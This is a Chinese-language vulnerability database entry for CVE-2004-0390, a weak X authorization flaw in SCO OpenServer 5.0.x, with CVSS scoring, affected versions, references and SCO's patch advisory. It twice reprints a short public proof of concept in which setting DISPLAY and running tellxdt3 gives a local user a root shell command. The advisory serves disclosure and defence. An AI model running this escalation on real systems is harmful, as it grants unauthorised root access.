CVE-2004-0390
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:38:18
NMCOES    

[原文]SCO OpenServer 5.0.5 through 5.0.7 only supports Xauthority style access control when users log in using scologin, which allows remote attackers to gain unauthorized access to an X session via other X login methods.


[CNNVD]SCO OpenServer StartX弱Xhost权限漏洞(CNNVD-200412-1085)

        SCO OpenServer 5.0.5到5.0.7在用户使用scologin注册时,只支持Xauthority风格的访问控制,远程攻击者可以借助其他X登陆方式获取对一个X会话的未授权访问权限。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sco:openserver:5.0.5
cpe:/o:sco:openserver:5.0.6
cpe:/o:sco:openserver:5.0.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0390
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0390
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1085
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/16113
(UNKNOWN)  XF  openserver-x-session-insecure(16113)
http://www.securityfocus.com/advisories/6684
(UNKNOWN)  SCO  SCOSA-2004.5
http://archives.neohapsis.com/archives/fulldisclosure/2004-05/0424.html
(UNKNOWN)  FULLDISC  20040510 OpenServer 5.0.5 OpenServer 5.0.6 OpenServer 5.0.7 : X sessions which are not started by scologin cannot use the X authorization protocol

- 漏洞信息

SCO OpenServer StartX弱Xhost权限漏洞
高危 配置错误
2004-12-31 00:00:00 2005-10-20 00:00:00
本地  
        SCO OpenServer 5.0.5到5.0.7在用户使用scologin注册时,只支持Xauthority风格的访问控制,远程攻击者可以借助其他X登陆方式获取对一个X会话的未授权访问权限。

- 公告与补丁

        SCO have released an advisory (SCOSA-2004.5) and fixes to address this issue. Customers are advised to see the referenced advisory for further details regarding obtaining and applying appropriate fixes. Fixed binaries were not observed on the SCO ftp server at the time of writing.
        SCO Open Server 5.0.5
        
        SCO Open Server 5.0.6
        
        SCO Open Server 5.0.7
        

- 漏洞信息 (20851)

SCO OpenServer 5.0.x StartX Weak XHost Permissions Vulnerability (EDBID:20851)
sco local
2001-05-07 Verified
0 Richard Johnson
N/A [点击下载]
source: http://www.securityfocus.com/bid/2731/info

OpenServer is a Unix based operating system distributed by Santa Cruz Operations.

A problem in access control of the X server could allow a local user to gain elevated privileges. When the X Window System is started via the xhost script, insufficient xhost access control allows a user to execute commands on the desktop. This can be exploited by setting the display environment variable, and using the tellxdt3 program.

This problem makes it possible for a local user to execute commands as root. 

$ pwd
/usr/lib/X11/IXI/XDesktop/bin/i3sc0322
$ DISPLAY=localhost:0
$ export DISPLAY
$ id
uid=232(kevin) gid=101(supp) groups=101(supp),50(group)
$ ./tellxdt3 /usr/bin/id
*** Can't open message catalogue XDesktop3
uid=0(root) gid=3(sys) groups=3(sys),1(other) 		

- 漏洞信息

6078
SCO OpenServer X Display Xauthority Bypass
Local Access Required Misconfiguration
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

OpenServer contains a flaw that may allow a malicious user to bypass X authorization. The issue is triggered when a different method than scologin is used to launch X. It is possible that the flaw may allow unauthorized access resulting in a loss of integrity.

- 时间线

2004-04-07 2004-04-07
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, SCO has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

SCO OpenServer StartX Weak XHost Permissions Vulnerability
Configuration Error 2731
No Yes
2001-05-07 12:00:00 2009-07-11 06:06:00
This vulnerability was announced to Bugtraq by Richard Johnson <thief@snosoft.com> on May 7, 2001.

- 受影响的程序版本

SCO Open Server 5.0.7
SCO Open Server 5.0.6
SCO Open Server 5.0.5
SCO Open Server 5.0.4
SCO Open Server 5.0.3
SCO Open Server 5.0.2
SCO Open Server 5.0.1
SCO Open Server 5.0

- 漏洞讨论

OpenServer is a Unix based operating system distributed by Santa Cruz Operations.

A problem in access control of the X server could allow a local user to gain elevated privileges. When the X Window System is started via the xhost script, insufficient xhost access control allows a user to execute commands on the desktop. This can be exploited by setting the display environment variable, and using the tellxdt3 program.

This problem makes it possible for a local user to execute commands as root.

- 漏洞利用

$ pwd
/usr/lib/X11/IXI/XDesktop/bin/i3sc0322
$ DISPLAY=localhost:0
$ export DISPLAY
$ id
uid=232(kevin) gid=101(supp) groups=101(supp),50(group)
$ ./tellxdt3 /usr/bin/id
*** Can't open message catalogue XDesktop3
uid=0(root) gid=3(sys) groups=3(sys),1(other)

- 解决方案

SCO have released an advisory (SCOSA-2004.5) and fixes to address this issue. Customers are advised to see the referenced advisory for further details regarding obtaining and applying appropriate fixes. Fixed binaries were not observed on the SCO ftp server at the time of writing.


SCO Open Server 5.0.5

SCO Open Server 5.0.6

SCO Open Server 5.0.7

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站